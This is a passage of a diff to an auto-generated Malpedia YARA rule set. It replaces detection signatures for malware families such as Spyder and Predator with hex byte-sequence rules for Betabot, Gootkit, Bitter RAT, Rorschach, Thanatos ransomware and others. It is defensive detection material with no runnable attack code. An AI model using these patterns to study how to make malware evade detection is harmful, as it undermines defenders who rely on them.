$sequence_2 = { 4863ed 4885ed 0f8ed8000000 8b54b430 } + $sequence_3 = { 4c8bc3 4c0f42c7 4d85c0 7504 8bc6 } + $sequence_4 = { 4889442470 448bb910010000 4532e4 448aea 488bd9 4585ff 0f8e1e020000 } + $sequence_5 = { 4533ff 4c8bf1 44397944 0f8e64010000 } + $sequence_6 = { 48894108 4c8b05???????? 488b15???????? 89442420 4d85c0 } + $sequence_7 = { 488b09 483bfb 4c8bc3 4c0f42c7 } + $sequence_8 = { 45380401 75f7 4c8bc0 498bd1 488d4c2438 } + $sequence_9 = { e8???????? 4898 4885c0 751e 483bfb 7313 83c8ff } + $sequence_10 = { 85c0 740b b9e8030000 ff15???????? } + $sequence_11 = { 4863f0 33d2 8bc2 48c1e006 } + $sequence_12 = { 3b566c 0f8d9e000000 488b4660 3b5668 7c1d 2b5668 } + $sequence_13 = { 7203 488b00 4c8bc0 498bd7 488d4de0 } + $sequence_14 = { 0f84f5000000 4883f910 7205 488b07 } + $sequence_15 = { 488d8c2490060000 e8???????? 90 488b942490060000 803a00 7505 4d8bc6 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <1573888 } -rule MALPEDIA_Win_Spyder_Auto : FILE +rule MALPEDIA_Win_Webc2_Head_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ab12f00-3358-5020-939c-e2c585a1665c" + id = "fbb157f3-5522-59eb-8966-994ac95b42ec" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spyder_auto.yar#L1-L176" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_head_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "bab678e49456b3f7ffea3f1f145c31d0ca13e5400d7a321bcd98016f59a4377c" + logic_hash = "3accb9e007709b9cb8a99022cd642781f2c16d496b60a9e07fc0420c29da6736" score = 75 quality = 75 tags = "FILE" @@ -158215,38 +160881,32 @@ rule MALPEDIA_Win_Spyder_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4053 4883ec20 8bd9 488d0da5a40000 ff15???????? 4885c0 7419 } - $sequence_1 = { 0f8493010000 488d156a5f0000 488bc8 ff15???????? 4885c0 0f847a010000 } - $sequence_2 = { 756e 488d4b04 4c8d05563e0000 418d5216 e8???????? 85c0 7437 } - $sequence_3 = { eb17 488b5638 498bcc ff5630 b97f000000 ff15???????? } - $sequence_4 = { 7422 488d15795e0000 488bce ff15???????? 488bc8 } - $sequence_5 = { 496374243c 4903f4 813e50450000 740b b9c1000000 } - $sequence_6 = { 7647 498bcd e8???????? 4c8d05478a0000 41b903000000 488d4c45bc 488bc1 } - $sequence_7 = { 85c0 7408 8bcb ff15???????? e8???????? 488d15faa20000 } - $sequence_8 = { 8b7d0c 8d0540460910 83780800 754e b741 b35a } - $sequence_9 = { 50 a3???????? e8???????? 8db6843d0910 bf???????? } - $sequence_10 = { 888800490910 eb1f 83f861 7213 83f87a 770e 8088????????20 } - $sequence_11 = { 83c424 aa 8d842484000000 6804010000 50 53 } - $sequence_12 = { 81e1ffff0000 50 51 68???????? 8d54243c } - $sequence_13 = { 68???????? 8d44242c 8d8c2494050000 50 68???????? } - $sequence_14 = { b801000000 5b 81c47c150000 c3 5f 5e 33c0 } - $sequence_15 = { 0fb6d2 f682014a091004 7403 40 } + $sequence_0 = { 8a8c0cc0000000 eb02 b13d c1e810 83e03f 0fbec9 } + $sequence_1 = { 68???????? 55 55 896c2434 ffd7 } + $sequence_2 = { 8d942444080000 03f0 51 50 52 55 ff15???????? } + $sequence_3 = { e8???????? 83c40c 85c0 0f8554020000 b900050000 } + $sequence_4 = { 33db 89442418 52 c6450000 } + $sequence_5 = { 7513 8dbc2444040000 83c9ff f2ae f7d1 49 894c241c } + $sequence_6 = { 89442410 c1e002 89442418 8b4c2424 } + $sequence_7 = { eb02 b03d 884303 8b442410 } + $sequence_8 = { 83c410 c3 5f c6450000 5e } + $sequence_9 = { 2500ff0000 45 3d003d0000 7435 } condition: - 7 of them and filesize <1458176 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Unidentified_109_Auto : FILE +rule MALPEDIA_Win_Snifula_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c4f891e4-f77b-5dbc-bacf-3b1d550b883c" + id = "3dffa8bc-fef5-5d9b-860e-b2ad6113d3e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_109_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snifula_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "553f5c1aaae307ba70f86b75a4cbec28cc4c8b523dbd68b695bc6b2028248608" + logic_hash = "5394c0842b5f05f382e3a7b0318fd2397f5c79fe7938989019ff20c4e8348941" score = 75 quality = 75 tags = "FILE" @@ -158260,32 +160920,32 @@ rule MALPEDIA_Win_Unidentified_109_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d55df 488d4df7 4c8d45f7 e8???????? 8bf0 85c0 } - $sequence_1 = { 7405 85db 0f44d8 0fb68fa2030000 0fbe45ab 3bc1 7e11 } - $sequence_2 = { e8???????? 488bcb e8???????? 488bdf 4885ff 75b5 488b742430 } - $sequence_3 = { 8b07 418b09 4883c704 4d8d4904 480fafcd 4803c8 418bc0 } - $sequence_4 = { 2b8300010000 3bc5 7312 8bd5 488bcb e8???????? 85c0 } - $sequence_5 = { 4c8b3a 4c8be1 4c8bea 488d4c2420 41b8a8040000 33d2 } - $sequence_6 = { 23c6 440bf0 8d040a 418bd3 4403f0 418bc3 c1c80b } - $sequence_7 = { eb77 418d41ff 4863c8 488d048f 33ff 4d8d048a } - $sequence_8 = { 0f8462020000 83b90001000000 7621 e8???????? 89834c020000 85c0 0f8550020000 } - $sequence_9 = { 4289449efc 4c3bdd 7c8b 8b442450 8b0b 4c8b742420 8903 } + $sequence_0 = { 53 ff35???????? ffd7 6800040000 53 ff35???????? } + $sequence_1 = { 53 6a00 ff35???????? ff15???????? b8???????? 83c9ff } + $sequence_2 = { 6a00 ff35???????? 8945fc ff15???????? 8bf8 85ff } + $sequence_3 = { a1???????? 85c0 75ef 53 57 bb???????? } + $sequence_4 = { ff15???????? 8bf8 83ffff 747f 53 8d450c 50 } + $sequence_5 = { e8???????? 85c0 740c 81386368756e 7504 834e1002 8bc6 } + $sequence_6 = { c1e802 25ff000000 8d44c72c 8b18 3bd8 7432 } + $sequence_7 = { 83f803 7533 ff7304 8bc7 ff750c e8???????? 8b4724 } + $sequence_8 = { 68???????? 56 ff15???????? 83c414 68???????? 56 } + $sequence_9 = { 53 50 889c243c010000 e8???????? a1???????? 83c43c 895c2430 } condition: - 7 of them and filesize <723968 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Jssloader_Auto : FILE +rule MALPEDIA_Win_Betabot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e1eaf0bc-7617-5378-87a8-cba9c6423b69" + id = "66328af7-8459-5b35-88d1-7e63b7ee5eb4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jssloader_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.betabot_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "186e7df3cf3822e82929f92759ecc1d78a3a2d538dfeac54de7cfb7d33d930ef" + logic_hash = "51b7b8c3c50a8d4a628d1b4c5d49a49007142cba41644cf909b7bfdb76b9cbc5" score = 75 quality = 75 tags = "FILE" @@ -158299,32 +160959,32 @@ rule MALPEDIA_Win_Jssloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89b5e0fbffff 660fd685e4fbffff 89b5ecfbffff 89b5e4fbffff 89b5e8fbffff 89b5ecfbffff } - $sequence_1 = { 0f4345b4 50 ff15???????? 8bf0 89b5c0fdffff 83feff 0f84b9020000 } - $sequence_2 = { 8945fc 56 8b7508 8d85fcfeffff 6800010000 6a00 50 } - $sequence_3 = { 899d0cffffff 6a04 68???????? c745d000000000 c745d40f000000 c645c000 e8???????? } - $sequence_4 = { 2bc6 83c0fc 83f81f 0f8797010000 e9???????? 8b854cfeffff 8d4804 } - $sequence_5 = { 51 ffb570feffff 8d4dcc e8???????? c645fc0b 8b55e0 8bc2 } - $sequence_6 = { 3b85ecfbffff 740a 8808 ff85e8fbffff } - $sequence_7 = { 8bc1 83e13f c1f806 6bc938 8b0485701d4400 80640828fe ff33 } - $sequence_8 = { 03f0 56 e8???????? 8b8534ffffff 83c40c 8b8d54feffff } - $sequence_9 = { 03f0 56 e8???????? 8b854cffffff 83c40c c6043000 8bb568feffff } + $sequence_0 = { 8d85e4f7ffff 89bde8f7ffff 50 33ff 56 47 56 } + $sequence_1 = { 8d44244c 50 ff15???????? 8d442448 50 e8???????? 8d442448 } + $sequence_2 = { 32c0 e9???????? 6a40 5e e8???????? a3???????? } + $sequence_3 = { 884617 2407 80fa40 7413 80fa80 7404 } + $sequence_4 = { 85c0 7503 6afd 58 5f 5e 5b } + $sequence_5 = { c20400 55 8bec 83ec18 53 56 8365f800 } + $sequence_6 = { a1???????? 85c0 740b 8d4dfc 51 ff7508 ffd0 } + $sequence_7 = { bbb0040000 85f6 7433 a1???????? 48 50 } + $sequence_8 = { 8a460a 3cb9 740c 3c33 7408 c70302000000 eb34 } + $sequence_9 = { 7470 66397508 746a 6a02 59 ff7508 66894de8 } condition: - 7 of them and filesize <581632 + 7 of them and filesize <835584 } -rule MALPEDIA_Win_Nvisospit_Auto : FILE +rule MALPEDIA_Win_Ismagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "824469e0-98f2-5eab-b839-ba6db77c2d16" + id = "efc3a6d8-4046-5104-90f5-9440914b7f87" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nvisospit_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ismagent_auto.yar#L1-L102" license_url = "N/A" - logic_hash = "385fb86660d71ea6f219554af1885e2ee67e8307dd338d6dbd8b2f326f4be091" + logic_hash = "d297d8bd0034edde53a6d3eb1d7bb7add88b3f450af6b836362398a9173b61dc" score = 75 quality = 75 tags = "FILE" @@ -158338,32 +160998,30 @@ rule MALPEDIA_Win_Nvisospit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83f801 0f851e010000 8d710c 81fe???????? 0f8350feffff 895dbc } - $sequence_1 = { a1???????? ffd0 83ec04 0fb785a2f9ffff 0fb7c0 8d959cf9ffff 89542410 } - $sequence_2 = { c70424???????? e8???????? 85db c705????????02000000 0f85d1fdffff } - $sequence_3 = { a1???????? 31c9 c705????????00004000 8b00 85c0 } - $sequence_4 = { 89442404 c70424???????? e8???????? 0fb785a8f9ffff } - $sequence_5 = { 0f8e16010000 85d2 0f8493010000 b9???????? 81f9???????? } - $sequence_6 = { 0fb7c0 8d959cf9ffff 89542410 c744240c00000000 8d958ef9ffff 89542408 } - $sequence_7 = { 83ec0c 8945bc 8b45bc 89442404 } - $sequence_8 = { e8???????? c7442404b0feffff c70424???????? e8???????? c7442404ccffffff c70424???????? } - $sequence_9 = { 8d9dacfbffff 81c307010000 895c2414 8d9dacfbffff 83c306 895c2410 894c240c } + $sequence_0 = { ba???????? 6a00 6800000080 6a00 6a00 68???????? 53 } + $sequence_1 = { 89442440 85c0 752b 50 68???????? } + $sequence_2 = { eb7c c745e000fe4100 ebbb d9e8 8b4510 } + $sequence_3 = { e8???????? 83c408 89442418 85c0 0f8479020000 } + $sequence_4 = { 68e8030000 ff15???????? 8d8c2418030000 8d5101 } + $sequence_5 = { 7432 8d842418030000 68???????? 50 e8???????? 8bf0 } + $sequence_6 = { 8bf2 0f1f4000 8a02 42 84c0 75f9 8dbc2400070000 } + $sequence_7 = { 8d0439 7413 0f1f4000 803823 740a } condition: - 7 of them and filesize <66560 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE +rule MALPEDIA_Win_Bitter_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "452f6306-c16f-58b7-84a1-ee288d662c0a" + id = "48708c16-f954-55fa-bcb7-85a1e067df06" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_ausov_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bitter_rat_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "e12dc956bf634cd764e774e1669338328ccbb898d34279d3918e11978d93f5a2" + logic_hash = "cf289391c2e8c84704b0f60fd200159e5bca809a29a5213fda197ca45567e744" score = 75 quality = 75 tags = "FILE" @@ -158377,32 +161035,32 @@ rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8501000000 f8 8b95f8fbffff 0355fc 8995f8fbffff 0f8407000000 } - $sequence_1 = { 83bdc4fdffff00 7507 33c0 e9???????? 8d8da8faffff 898d4cfaffff } - $sequence_2 = { 0f8487000000 8b3d???????? 68???????? 56 } - $sequence_3 = { 0f8407000000 0f8501000000 f8 68???????? } - $sequence_4 = { 83c101 894df8 8b55f8 3b55f4 7d31 0f8407000000 } - $sequence_5 = { f7d1 83c1ff 51 8d95f8feffff 52 } - $sequence_6 = { 0f8501000000 f8 68???????? 8d8dfcfbffff 51 } - $sequence_7 = { 6804010000 8d85a8faffff 50 68???????? ff15???????? 8985c4fdffff 83bdc4fdffff00 } - $sequence_8 = { 81ec10040000 53 56 57 0f8407000000 0f8501000000 } - $sequence_9 = { e8???????? 83c404 8b4d0c 894104 e9???????? 8dbdfcfbffff 83c9ff } + $sequence_0 = { 8bf4 6830750000 ff15???????? 3bf4 e8???????? e9???????? } + $sequence_1 = { e8???????? 8d856cf8ffff 50 8b8da8feffff 51 e8???????? } + $sequence_2 = { ff15???????? 3bf4 e8???????? 898574d8ffff 8bf4 8d858cd8ffff } + $sequence_3 = { 83c408 8d85fcd8ffff 50 e8???????? 83c404 898558d9ffff 8b8558d9ffff } + $sequence_4 = { ff15???????? 3bf4 e8???????? 8945a0 8bf4 6a01 } + $sequence_5 = { eb12 8b45f4 83e801 8945f4 8b4de8 83c101 894de8 } + $sequence_6 = { 89859cdbffff 8b8d9cdbffff 81e9d3070000 898d9cdbffff 83bd9cdbffff15 0f872b020000 8b959cdbffff } + $sequence_7 = { 8d1c8d00124700 8bf0 83e61f c1e606 8b0b 0fbe4c3104 83e101 } + $sequence_8 = { e8???????? 83c404 85c0 7420 e8???????? 8bf4 68d0070000 } + $sequence_9 = { 3b05???????? 0f8688000000 a1???????? d1e0 3945f8 760b 8b4df8 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <1130496 } -rule MALPEDIA_Win_Predator_Auto : FILE +rule MALPEDIA_Win_Tabmsgsql_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "139b7e6c-7d6f-5725-bc06-83e05af2728a" + id = "95969567-7681-52bb-9f9f-efce304f47a8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.predator_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tabmsgsql_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "4f1faf378ed80607ad7505f3b525c8d2a5bbf8d81c1cadcdd453ab7a1d609878" + logic_hash = "7b59d9e77530877005ccccefb5d251d16423422a57046d3f1c0987aa86d57fc9" score = 75 quality = 75 tags = "FILE" @@ -158416,34 +161074,34 @@ rule MALPEDIA_Win_Predator_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83ec18 8bc2 56 8bf1 8d4dfd } - $sequence_1 = { 80c230 8811 85c0 75f2 51 8d45fd } - $sequence_2 = { 8d4dfd 57 6a0a 5f 85c0 7916 } - $sequence_3 = { 03c2 8bce 50 e8???????? 5f 8bc6 5e } - $sequence_4 = { 7508 83c8ff e9???????? ff75ec e8???????? } - $sequence_5 = { 83ec18 8bc2 56 8bf1 8d4dfd } - $sequence_6 = { ff75ec e8???????? 59 8bf0 } - $sequence_7 = { 7508 83c8ff e9???????? ff75ec e8???????? 59 8bf0 } - $sequence_8 = { 894e08 89560c 834dfcff 8b4df4 64890d00000000 5f 5e } - $sequence_9 = { 8b00 57 03c2 8bce } + $sequence_0 = { 33c0 f2ae f7d1 2bf9 8bd1 8bf7 8bbc24a4010000 } + $sequence_1 = { 8a443901 c0fb02 8a80c8244100 c0e004 02c3 880416 } + $sequence_2 = { 8882c8254100 48 42 83f841 } + $sequence_3 = { 8bf8 75ce 8b6c2414 8b542418 b8ad8bdb68 } + $sequence_4 = { 6804010000 8b842478030000 52 c744242844000000 c744245401010000 8b08 8b400c } + $sequence_5 = { f2ae f7d1 49 8d85c8f7ffff } + $sequence_6 = { 0f8eb2000000 8b7c2414 0fbe05???????? 33db 8a1c39 3bd8 } + $sequence_7 = { ff15???????? b940000000 33c0 bf???????? 68???????? f3ab 68???????? } + $sequence_8 = { a1???????? 50 ff15???????? b940000000 33c0 bf???????? } + $sequence_9 = { 33c0 8a443901 c0fb02 8a80c8244100 c0e004 02c3 880416 } condition: - 7 of them and filesize <2211840 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Crypmic_Auto : FILE +rule MALPEDIA_Win_Gootkit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "50202601-a687-564d-add6-7e6f376e5e2e" + id = "50659808-58ce-5271-8f0d-8034418275c7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypmic_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gootkit_auto.yar#L1-L327" license_url = "N/A" - logic_hash = "9041d9d560914890b77f3fcac1afa5aa11364ed26eb5680a449dc6f4542c2153" + logic_hash = "a2cf121428fb2173dc07901e77686f48303de5dc8bfa584df38195e7a090200e" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158455,32 +161113,58 @@ rule MALPEDIA_Win_Crypmic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 395818 764a 8b7820 03f9 } - $sequence_1 = { 2bc1 74ec 46 3b75fc 770b 8b55f8 } - $sequence_2 = { 8b4de4 894f04 8b4de8 894f08 668b4df0 66894f0c 668b45f2 } - $sequence_3 = { 33d2 8d642400 8d4001 66890c17 } - $sequence_4 = { 50 8b4608 6a08 ff7604 ffd0 } - $sequence_5 = { 33c0 8bcf 66894302 e8???????? } - $sequence_6 = { 43 83c704 3b5818 72bb 5f } - $sequence_7 = { 55 8bec 83ec0c 8b413c 53 8b440878 03c1 } - $sequence_8 = { 5d c20800 8b55fc 8b4224 8d0458 0fb70c08 8b421c } - $sequence_9 = { 8b440878 03c1 8945fc 395818 } + $sequence_0 = { 6a04 6800300000 57 6a00 897df8 } + $sequence_1 = { 50 ff75fc ffd7 33c9 c745f804000000 41 33f6 } + $sequence_2 = { 8945f0 85c0 7435 8b01 ff75f4 03c3 } + $sequence_3 = { e8???????? 8bd8 85db 0f45f3 33c0 50 } + $sequence_4 = { 83feff 7509 57 ff15???????? 8bf0 53 } + $sequence_5 = { 895de8 2bf1 75d5 8b5df0 8b5508 51 } + $sequence_6 = { 6a00 53 ff15???????? eb06 8b7dd8 } + $sequence_7 = { 8bd6 e8???????? 8b7dfc 59 59 85c0 } + $sequence_8 = { f3aa 68???????? ff15???????? 50 } + $sequence_9 = { 8b7df4 32c0 8b4de4 f3aa } + $sequence_10 = { 50 e8???????? 83c40c 68fd000000 } + $sequence_11 = { 50 68???????? ff15???????? 85c0 7505 e8???????? } + $sequence_12 = { 50 8b4508 8b00 99 } + $sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d c3 } + $sequence_14 = { 833d????????00 750a 6a32 ff15???????? } + $sequence_15 = { 6808020000 6a00 ff15???????? 50 } + $sequence_16 = { e8???????? 6a0c 6a08 ff15???????? 50 ff15???????? } + $sequence_17 = { 50 6a02 ff15???????? 6888130000 } + $sequence_18 = { e8???????? 8d45fc 50 6a01 6a01 } + $sequence_19 = { e8???????? 85c0 750c c705????????03000000 } + $sequence_20 = { 8b4508 8b00 99 52 50 6a00 } + $sequence_21 = { 68???????? 51 51 ff15???????? 50 } + $sequence_22 = { 53 53 53 8901 } + $sequence_23 = { 83faff 7508 ff15???????? 8bd0 } + $sequence_24 = { e8???????? 3935???????? 7412 83ec0c ba???????? b9???????? } + $sequence_25 = { 6a40 6a00 8bf7 57 81e60000ffff e8???????? 8b4608 } + $sequence_26 = { ff15???????? a3???????? 391d???????? 7428 85c0 } + $sequence_27 = { 8d4204 3bc8 7344 2bca 898de4fdffff 034e0c } + $sequence_28 = { ff15???????? 85c0 7510 8d4864 } + $sequence_29 = { 0f114710 0f104030 0f114f20 0f104840 0f114730 0f104050 } + $sequence_30 = { 85c0 7550 ff15???????? 8bf8 893d???????? } + $sequence_31 = { 6a1c 50 56 ff15???????? 8b4de8 } + $sequence_32 = { 0f104010 0f110f 0f104820 0f114710 } + $sequence_33 = { 0f114f50 0f104060 0f114760 8b4070 894770 be01000000 } + $sequence_34 = { 8d4864 ff15???????? ffc3 83fb0a 7cd5 } + $sequence_35 = { 0f104050 0f114f40 0f104860 0f114750 0f114f60 b801000000 } condition: - 7 of them and filesize <81920 + 7 of them and filesize <516096 } -rule MALPEDIA_Win_Lightbunny_Auto : FILE +rule MALPEDIA_Win_Rorschach_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "546c8a57-6f91-59bb-b683-389534c380bb" + id = "1c4aea68-8f40-596d-a63a-efb95cb498a7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightbunny_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rorschach_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4c0608cdc020e5347f646e557ecb414bd8f3027b0aca947da82d4930945e8be1" + logic_hash = "0cdb3537df7f12a9076109ea202e9af8c6db5ccfaaca59c4a71971579385ead3" score = 75 quality = 75 tags = "FILE" @@ -158494,32 +161178,32 @@ rule MALPEDIA_Win_Lightbunny_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6bc930 8b048520ae4100 0fb6440828 83e040 5d } - $sequence_1 = { 8bc1 83e13f c1f806 6bc930 8b048520ae4100 f644082801 } - $sequence_2 = { 83c404 6a02 ff35???????? ffd3 } - $sequence_3 = { 894708 0fb74602 50 ff15???????? } - $sequence_4 = { ff35???????? ff15???????? c705????????00000000 8b4dfc } - $sequence_5 = { 51 ff15???????? 85c0 740e 8b400c 8b00 } - $sequence_6 = { 8d3c9d58ab4100 f00fb10f 8bc8 85c9 740b } - $sequence_7 = { 83c404 83f801 0f851dffffff 8b5710 33c9 b8???????? 90 } - $sequence_8 = { 6bc030 c1f906 03048d20ae4100 eb02 8bc6 80782900 7522 } - $sequence_9 = { 8b75f8 33ff 8b0d???????? 8bc6 8945e4 894de8 } + $sequence_0 = { 33d2 488d8df8020000 e8???????? 88850e030000 b26e 488d8df8020000 e8???????? } + $sequence_1 = { f65d7f 488d15ece30000 4c8d05e9e30000 488955df 488d05d2e30000 488955e7 488945bf } + $sequence_2 = { f5 66d3f7 66c1f703 d3d7 4801e3 d2f0 c0f807 } + $sequence_3 = { f30f7f4de0 660f6f05???????? f30f7f45f0 660f6f0d???????? f30f7f4d00 c74510771a771b c6451477 } + $sequence_4 = { 0c40 8845df e8???????? 4c8d05e8180700 488d55c0 488d4da0 e8???????? } + $sequence_5 = { 33c0 48894310 48c7431807000000 668903 488b4c2458 4833cc e8???????? } + $sequence_6 = { 33d2 488d4da8 e8???????? 8845b4 b272 488d4da8 e8???????? } + $sequence_7 = { e8???????? 88851e0b0000 b265 488d8de0080000 e8???????? 88851f0b0000 33d2 } + $sequence_8 = { e8???????? c60000 ba0f000000 488d4d99 e8???????? c60000 488d4d99 } + $sequence_9 = { f6d4 660fbec0 0f98c0 488d7f01 0fb6c0 0f94c4 88f0 } condition: - 7 of them and filesize <2376704 + 7 of them and filesize <3921930 } -rule MALPEDIA_Win_Unidentified_103_Auto : FILE +rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16a9604f-a791-56b5-96cf-005a08b625a2" + id = "fa527852-1102-5288-af99-f970a4826a1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_103_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thanatos_ransom_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "ea0101ff935636b4e103b28ee875e3c3a8b80a54f2863e597f7dff9a335e50db" + logic_hash = "9c5c5f690fb079c4870ec7aa84eb31a9ced013d63674be92b3d66d32a913f4ab" score = 75 quality = 75 tags = "FILE" @@ -158533,32 +161217,32 @@ rule MALPEDIA_Win_Unidentified_103_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85db 0f8506030000 8b442470 ffd0 8b542478 81c41c070000 } - $sequence_1 = { 8954240c 8b9424e4000000 89742404 83ea04 89542408 8b8404cc0b0000 8b00 } - $sequence_2 = { 83ec08 85c0 7439 8b8424bc010000 890424 8b44246c ffd0 } - $sequence_3 = { 0fb613 89c3 8d6c11e0 01d1 } - $sequence_4 = { 890424 8b842488000000 ffd0 83ec08 8b842484010000 890424 8b8424a4000000 } - $sequence_5 = { 31db ffd6 c684249803000000 898424bc000000 b878650000 6689842496030000 b865000000 } - $sequence_6 = { c744240804000000 89442404 8b842484010000 890424 8b8424ac000000 ffd0 } - $sequence_7 = { 0f84d3070000 81fd03030000 0f85d5060000 8b842484010000 c744240402000000 89fb be01000000 } - $sequence_8 = { 8bb4244c010000 01ca 880431 0fb68424a5010000 8844290a 0fb68424a6010000 8844290b } - $sequence_9 = { 83ec08 0fb68c2450040000 84c9 741f 31d2 83c201 } + $sequence_0 = { 50 ff75e0 e8???????? 8b4df8 8bc7 5f 33cd } + $sequence_1 = { 8b00 8bc8 e8???????? c645fc0a } + $sequence_2 = { 50 e8???????? 56 8bd0 c645fc04 } + $sequence_3 = { 83c404 c60300 ff15???????? 50 e8???????? be14000000 } + $sequence_4 = { c745500f000000 c7454c00000000 c6453c00 83f810 7242 8b4d54 } + $sequence_5 = { 88441de8 43 8975e0 83fb04 757c 33f6 8a4435e8 } + $sequence_6 = { 8b0c85e0774300 8a06 46 8844392c 2bf2 eb14 } + $sequence_7 = { 0f8580000000 8b4508 dd00 ebc6 c745e0a0bd4200 e9???????? } + $sequence_8 = { 40 8d4de0 50 ff75e0 